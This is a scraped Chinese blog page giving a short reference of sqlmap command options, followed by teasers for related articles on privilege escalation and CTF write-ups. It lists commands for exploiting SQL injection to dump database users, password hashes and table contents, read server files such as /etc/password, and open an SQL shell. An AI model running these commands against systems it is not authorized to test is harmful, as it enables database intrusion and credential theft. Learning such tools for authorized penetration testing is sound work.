mysql中的rm语句用法_SQLMap部分命令用法详解

最新推荐文章于 2023-10-27 09:50:43 发布
最新推荐文章于 2023-10-27 09:50:43 发布
阅读量202 收藏
点赞数
文章标签: mysql中的rm语句用法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36035750/article/details/114342449
版权

SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,它可以自动的探测和利用SQL注入漏洞来接管数据库等,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。

1)判断当前用户是否是dba

python sqlmap.py -u "url" --is-dba -v 1

2)--users:列出数据库管理系统用户

python sqlmap.py -u "url" --users -v 0

3)--passwords:数据库用户密码(hash)

python sqlmap.py -u "url" --passwords -v 0

python sqlmap.py -u "url" --passwords -U sa -v 0

4)查看用户权限

python sqlmap.py -u "url" --privileges -v 0

python sqlmap.py -u "url" --privileges -U postgres -v 0

5)--dbs可以利用的数据库

python sqlmap.py -u "url" --dbs -v 0

6)--tables列数据库表

python sqlmap.py -u "url" --tables -D "information_scheam"

-D:指定数据名称

7)--columns 列出表中的列名

python sqlmap.py -u "url" --columns -T "user" -D "mysql" -v 1

-T:指定表名,-D:指定库名

8)--dump列表中指定列的内容

python sqlmap.py -u "url" --dump -T "users" -D "testdb"

-C:可以指定字段

指定列的范围为2到4

python sqlmap.py -u "url" --dump -T "users" -D "testdb"  --start 2 --stop 4 -v 0

9)--dumap-all列出所有数据库,所有表内容

python sqlmap.py -u "url" --dump-all -v 0

只列出用户自己新建的数据库和表的内容

python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0

10)--file读取文件内容[load_file()函数]

python sqlmap.py -u "url" --file /etc/password

11)执行SQL

python sqlmap.py -u "url" --sql-shell

12)-p 指定参数

python sqlmap.py -u "url" -v 1 -p "id"

-p可以指定多参数-p "cat,id"

13)POST提交

python sqlmap.py -u "url" --method POST --data "id=1"

14)COOKIE提交

python sqlmap.py -u "url" --cookie "id=1" -v 1

皮友萍
关注
linux下 udf提权_udf提权
weixin_34862561的博客
01-14 1065
0x00前言:udf提权是通过数据库来实现获取目标的管理员的shell,来达到从低权限提权到高权限0x01什么是udf:udf(Userdefined function)是用户自定义函数在mysql函数是什么,比如mysql常见的sleep(),sum(),ascii()等都是函数udf就是为了让我们开发者能够自己写方便自己函数,它有3种返回值,这三种分别是STRING,INTEGER,REA...
备战CTF做题题解
weixin_40707492的博客
07-21 6667
备战CTF初期,没有什么经验,部分操作过程有借鉴大佬
MYSQLrm -rf mysql 之数据恢复
01-09
第一步 切记!!!切记!!!切记!!!!别着急着跑路     维持现场状态,不能重启机子,也不行关闭运行mysql的进程,如果关闭就无法对数据进行恢复了; 这是因为:文件实际上是一个指向inode的链接, inode链接包含了文件的所有属性, 比如权限和所有者, 数据块地址(文件存储在磁盘的这些数据块). 当你删除(rm)一个文件, 实际删除了指向inode的链接, 并没有删除inode的内容. 进程可能还在使用. 只有当inode的所有链接完全移去, 然后这些数据块将可以写入新的数据. ·    proc文件系统可以协助我们恢复数据. 每一个系统上的进程在/proc都有一个目录和自己的
相见恨晚SQL之 关系模型(RM)即RelationalModel
www.v5qq.com的技术博客
07-16 225
关系模型把世界看作是由实体(Entity)和联系(Relationship)构成的。 所谓实体就是指现实世界具有区分与其它事物的特征或属性并与其它实体有联系的对象。在关系模型实体通常是以表的形式来表现的,表的每一行描述实体的一个实例,表的每一列描述实体的一个特征或属性。 所谓联系就是指实体之间的关系,即实体之间的对应关系。联系可以分为三种: 一对一的联系:如一个人只有一种性别...
mysql的usedb_最强Linux和Mysql面试题套餐,让你的面试无懈可击!
weixin_39926613的博客
01-28 250
引言:大家好,我是一菲,在软件测试当linux 操作系统和Mysql数据库的内容是十分的知识同时也是十分重要的。所以一菲这两天通过查阅资料等其他方式为大家梳理了liunx和Mysql面试题大礼包,我想我真的很用心了,看完这篇文章可能需要10分钟的样子,大家要做好心理准备。正文:一. Linux面试题1.Linux的文件系统目录配置要遵循FHS规范,规范定义的两级目录规范如下:/home 每个账号...
mysqlrm语句用法_mysql explain用法
weixin_33215370的博客
01-27 144
explain显示了mysql如何使用索引来处理select语句以及连接表。可以帮助选择更好的索引和写出更优化的查询语句。使用方法,在select语句前加上explain就可以了,如:explain select * from statuses_status where id=11;explain列的解释table:显示这一行的数据是关于哪张表的type:这是重要的列,显示连接使用了何种类型。从最...
mysql+rm命令详解_更安全的rm命令,保护重要数据
weixin_42356139的博客
01-27 402
更安全的rm命令,保护重要数据网上流传的安全的rm,几乎都是提供一个rm的"垃圾"回收站,在服务器环境上来说,这实非良方。我想,提供一个安全的rm去保护一些重要的文件或目录不被删除,避免出现重要数据误删的悲剧,或许才是更佳方案。我写了一个脚本:https://github.com/malongshuai/rm_is_safe ,源码和用法本文后面已经提供了,不过各位愿意捧场的可以去github上点...
笔记,后期整理
weixin_30278237的博客
08-06 8413
VM 虚拟各种系统的工具 安装目录 不要放在C盘 需要下载的镜像Windows NT win7 xp server08R2 server12类Nnix centos 6/7/8 ubuntu 14/16/18 kali安装 win7 1g=1024M1M=1024KB1KB=1024bit1bit 是一个字节 一个字节就是8位由0或者1组成(二进制) 10 进制0-9组成的数字...
红队专题-Perm权限提升与维持隐匿Privilege Escalation
最新发布
aming小老弟
10-27 1009
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统的敏感信息, system权限也可以提取内存的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
mysqlrm语句用法_mysql常用操作语句 | moon's blog
weixin_33173126的博客
01-27 651
1.进入数据库:2.列出数据库:3.选择数据库:usedatabases_name;4.列出数据表:5.显示表格列的属性:showcolumnsfromtable_name;describetable_name;6.导出整个数据库:例如:my7.导出一个表:mysqldump-uuser_name-pdatabase_nametable_name>/tmp/file_na...
常用SQL语句词典
幸福的拾荒者
12-21 835
常用SQL语句词典 Q0.创建用户【前提】你必须有CREATE USER系统权限。当你使用CREATE USER语句创建一个新用户后,该用户的权限是空的,要登录到ORACLE该用户必须有CREATE SESSION 系统权限。因此在创建用户之后,你至少应该授予用户CREATE SESSION 权限。【示例】创建一个用户的例子如果你创建一个新用户使用PASSWORD EXPIRE项,在尝
mysql+rm命令详解_Mysql数据库清理binlog日志命令详解
weixin_39922683的博客
01-20 213
概述今天主要分享下mysql数据库应该如何正确的删除binlog日志,这里要注意不要强制使用rm命令进行清除。否则mysq-bin.index错乱,最终导致后期expire-log-days配置项失效。1、查看binlog日志mysql> show binary logs;2、删除某个日志文件之前的所有日志文件purge binary logs to 'mysql-bin.000035';3...
mysqlrm语句用法_Linuxrm命令起什么作用呢?
weixin_28880179的博客
02-08 353
摘要:下文讲述Linuxrm的功能说明,如下所示;rm命令功能:用于删除一个目录或多个目录或删除一个文件或多个文件rm命令的语法格式:rm [参数] [文件]-----常用参数说明-------f:忽略不存在的文件,不会出现警告信息-i:删除前会询问用户是否操作-r/R:递归删除-v:显示指令的详细执行过程-----注意事项----1.如果目录下为链接信息,则只会删除删除符号链接2.此命令是一个...
删库跑路真的没必要了!!!!!!!! rm -rf mysql 之数据恢复
段远山
04-21 697
切记!!!切记!!!切记!!!!别着急着跑路 跑路了那你就真的亏喽!!!!! 解决方法 yum -remove mysql //卸载mysql rm -rf var/mysql //删除mysql相关文件 rm -rf var/lib/mysql //删除mysql相关文件 yum install mysql-server php php-devel php-mysql /...
绝了!一个妹子 rm -rf 把公司整个数据库删没了...
程序员白楠楠的博客
09-14 1124
经历了两天不懈努力,终于恢复了一次误操作删除的生产服务器数据。 对本次事故过程和解决办法记录在此,警醒自己,也提示别人莫犯此错。 也希望遇到问题的朋友能找到一丝灵感解决问题。 01 事故背景 安排一个妹子在一台生产服务器上安装 Oracle,妹子边研究边安装,感觉装的不对,准备卸载重新安装。 从网上找到卸载方法,其要执行一行命令删除 Oracle 的安装目录,命令如下: rm -rf $ORACLE_BASE/* 如果 ORACLE_BASE 这个变量没有赋值,那命令就变成了: rm -rf /*
sql server 误操作后恢复_rm -rf / 删库后除了跑路,你还可以Carry全场!
weixin_39633807的博客
11-27 610
作为IT资讯界的活跃分子之一,删库到跑路一直是科技领域的百年硬梗!他真的很“硬”!据小编“不准确”统计,近年来由于删库导致的业界事故N起,数据丢失N万,预计损失达到N亿。近几年发生的著名数据库删除事件有:2017 年 2 月,GitLab 的一位系统管理员在给线上数据库做负载均衡工作时,遭受了 DDoS 攻击。在阻止了攻击之后,运维人员发现了数据库不同步的问题,便开始修复,在修复过程,错误地在生...
【设计模式】解释器模式
yhl_jxy的博客
10-01 775
解释器模式作用: 给定一种语言,定义他的文法的一种表示,并定义一个解释器,该解释器使用该表示来解释语言句子。 应用场景: (1)有一个简单的语法规则,比如一个sql语句,如果我们需要根据sql语句进行rm转换,就可以使用解释器模式来对语句进行解释。 参与对象: (1)AbstractExpression(抽象表达式) 声明一个所有具体表达式都要实现的抽象接口(或者抽象类)
MySQL高级篇笔记-数据库备份与恢复(下) 】
蛋饼吧的博客
06-14 1334
数据迁移(data migration)是指选择、准备、提取和转换数据,并将数据从一个计算机存储系统永久地传输到另一个计算机存储系统的过程。此外,验证迁移数据的完整性和退役原来旧的数据存储,也被认为是整个数据迁移过程的一部分。数据库迁移的原因是多样的,包括服务器或存储设备更换、维护或升级,应用程序迁移,网站集成,灾难恢复和数据心迁移。根据不同的需求可能要采取不同的迁移方案,但总体来讲,MySQL 数据迁移方案大致可以分为物理迁移和逻辑迁移两类。通常以尽可能自动化。
sqlmap文使用手册:自动化SQL注入工具详解
本文档提供了sqlmap的详细使用指南,涵盖了参数配置、测试方法、数据提取等多个方面,是学习和使用sqlmap进行渗透测试的重要参考资料。" sqlmap是一款强大的自动SQL注入工具,它的主要目标是帮助安全测试人员发现并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值